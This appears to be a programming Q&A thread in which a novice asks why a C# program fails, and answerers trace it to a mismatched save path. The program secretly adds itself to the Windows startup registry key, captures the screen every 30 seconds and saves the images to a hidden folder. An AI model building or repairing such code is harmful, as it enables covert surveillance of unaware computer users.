# Why isn't my C# code working?

Tags: c#, visual-studio

My program is supposed to take screenshots every 30 seconds and then store them in a hidden folder, C:\SysApp. I'm new to coding and Visual Studio doesn't say there are any errors so I am very confused. Maybe you can help me please? Thanks!

Here's my code:

```css
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading;
using System.Reflection;
using System.Windows.Forms;
using System.Net.Mail;
using System.IO;
using System.Drawing;

namespace screenshothoop
{
    static class Program
    {
        static void Main()
        {
            //-----this code will make your program to automatically execute as computer starts----
            try
            {
                Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                Assembly curAssembly = Assembly.GetExecutingAssembly();
                key.SetValue(curAssembly.GetName().Name, curAssembly.Location);
                Console.WriteLine(curAssembly.GetName());

            }
            catch { }
            //------------------

            //------------screenshot  loop takes screenshots after 30 sec-----------
            int n = 0;
            while (n == 0)
            {
                Thread.Sleep(30000);
                OnTimedEvent();
            }
            //-------------------------

        }// main body ends !

        public static string st = "";
        public static string date = "";
        public static string month = "";
        public static string year = "";
        public static string time = "";
        public static string hour = "";
        public static string min = "";
        public static string sec = "";


        private static void OnTimedEvent()
        {
            st = DateTime.Today.Date.ToString();
            time = DateTime.Now.TimeOfDay.ToString();

            hour = DateTime.Now.Hour.ToString();
            min = DateTime.Now.Minute.ToString();
            sec = DateTime.Now.Second.ToString();

            date = DateTime.Today.Day.ToString();
            month = DateTime.Today.Month.ToString();
            year = DateTime.Today.Year.ToString();

            Console.WriteLine("The Elapsed event was raised at {0}_{1}_{2} at time {3}_{4}_{5} ", date, month, year, hour, min, sec);

            Bitmap memoryImage;
            memoryImage = new Bitmap(1000, 800);
            Size s = new Size(memoryImage.Width, memoryImage.Height);

            // Create graphics
            Graphics memoryGraphics = Graphics.FromImage(memoryImage);
            // Copy data from screen
            memoryGraphics.CopyFromScreen(0, 0, 0, 0, s);
            string str = "";

            //------------creating directory--------
            if (Directory.Exists("C:\\SysApp"))
            {
                Console.WriteLine("directory exits");
            }
            else
            {
                Directory.CreateDirectory("C:\\SysApp");
                File.SetAttributes("C:\\SysApp", FileAttributes.Hidden);
                Console.WriteLine("new directory created");
            }
            //---------------------------------------

            str = string.Format("d:\\screenshotn\\screen {0}_{1}.png", date + month + year, hour + min + sec);

            //------------

            try
            {
                memoryImage.Save(str);
            }
            catch (Exception er)
            {
                Console.WriteLine("Sorry, there was an error: " + er.Message);
            }

            //---------------------------------------------------------



        }
    }
}
```

Comment: does this path exist: d:\screenshotn\

Comment: What does "not working" mean? What results do you et and what did you expect instead? Apart from this "why isn´t my code working" is a really bad title for your question. Please be more specific on your problem.

Comment: @Adsy2010 Oh, I must've accidentally deleted it. How do I fix it?

Comment: If you don't know what Debugging is, have a look. By stepping through each line of this code you'd probably notice the incorrectly written variable.

Comment: This question is a by-product of the real problem that you face, which is not knowing how to use the (excellent) [debugging features](https://msdn.microsoft.com/en-us/library/k0k771bt.aspx) of your IDE. Get to grips with them so you don't have to ask weak questions here.

Comment: @HimBromBeere It's just sitting there and not doing anything. The program starts up, but then nothing. Also, thank you for telling me that. I'll correct it now. :)

Comment: Also, I have debugged it. I just don't know how to fix that variable. I guess I shoul've stated that in my orginal question though. Thank you.

Answer (score 6):

First you check if `C:\SysApp` exists, if not, you create it. So far so good. Then you write the image to `D:\screenshotn\Etc.` which probably does not exists. Or if it does exist, you check the wrong folder for your images. :)

Change this line:

```
str = string.Format("d:\\screenshotn\\screen {0}_{1}.png", date + month + year, hour + min + sec);
```

to

```
str = string.Format("C:\\SysApp\\screen {0}_{1}.png", date + month + year, hour + min + sec);
```

Comment: So it's trying to save to `D:\screenshotn\Etc.`?

Comment: well spotted! +1 for your sharp eye

Comment: @Theresa.Eckert: I edited my answer to be more clear.

Comment: Yeah, I must've deleted `D:\screenshotn\Etc.` on accident. How do I fix it? Just create it again manually?

Comment: @Theresa.Eckert: First you have to make a choice: Where do I want to save the images. If if is `C:\SysApp` make sure your code only uses that location. If you choose for `D:\screenshotn`, then make sure your code only uses that one. Including the code which check and creates the existence of the folder.

Comment: Hmm I did that and it's still not working. I think there's something wrong with line 21; `Assembly curAssembly = Assembly.GetExecutingAssembly();`, but I don't know what.

Answer (score 1):

Your code could be more clearly summarised as:

```
memoryImage = new Bitmap(1000, 800);
...
str = string.Format("d:\\screenshotn\\screen {0}_{1}.png", date + month + year, hour + min + sec);
...
memoryImage.Save(str);
```

If you look online for a resource explaining what `Bitmap.Save` does, found [here](https://msdn.microsoft.com/en-us/library/ktx83wah(v=vs.110).aspx), you'll see the first parameter describes where the file is written to disk.

As `str` is set to "d:\screenshotn\sc...", it therefore is being written to a different drive as the one you previously setup.

Comment: Oh! That actually makes a whole lot of sense now. Stupid mistake on my part. Thank you so much. :)